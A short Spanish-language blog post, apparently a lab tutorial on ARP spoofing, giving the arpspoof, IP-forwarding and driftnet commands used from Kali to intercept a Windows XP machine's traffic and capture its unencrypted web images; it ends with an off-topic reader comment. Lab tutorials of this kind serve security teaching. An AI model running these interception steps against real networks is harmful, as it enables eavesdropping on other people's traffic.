Borrar tabla arp
arp -d
Ver tabla arp
arp -a
En Windows ejecutar:
arp -a
ping www.google.es -n 200 //lanzaremos el ping 200 veces para que nos de tiempo en la Kali a ejecutar el arpspoof
En Kali ejecutar:
setxkbmap es –> para poner teclado en Español
arpspoof -i eth0 -t 192.168.126.133 192.168.126.2
arpspoof -i eth0 -t 192.168.126.2 192.168.126.133
Los dos anteriores comandos se pueden reducir en una sola línea
arpspoof -i eth0 -t 192.168.126.133 192.168.126.2 -r //La «r» sería de reverese
En cuanto lancemos la orden el la Kali podremos observar en la máquina XP lo siguiente.
cat /proc/sys/net/ipv4/ip_forward
echo 1 > /proc/sys/net/ipv4/ip_forward
Tras ejecutar en la Kali los dos comandos anteriores podremos observar en el XP lo siguiente.
driftnet -i eth0 //Para comprobar este comando, la máquina XP tendrá que navegar sobre una página web sin cifrar, es decir, un http
Una idea sobre “ARP Spoofing”
Sensacional post, una información muy valiosa sobre el seo, gracias por esta información.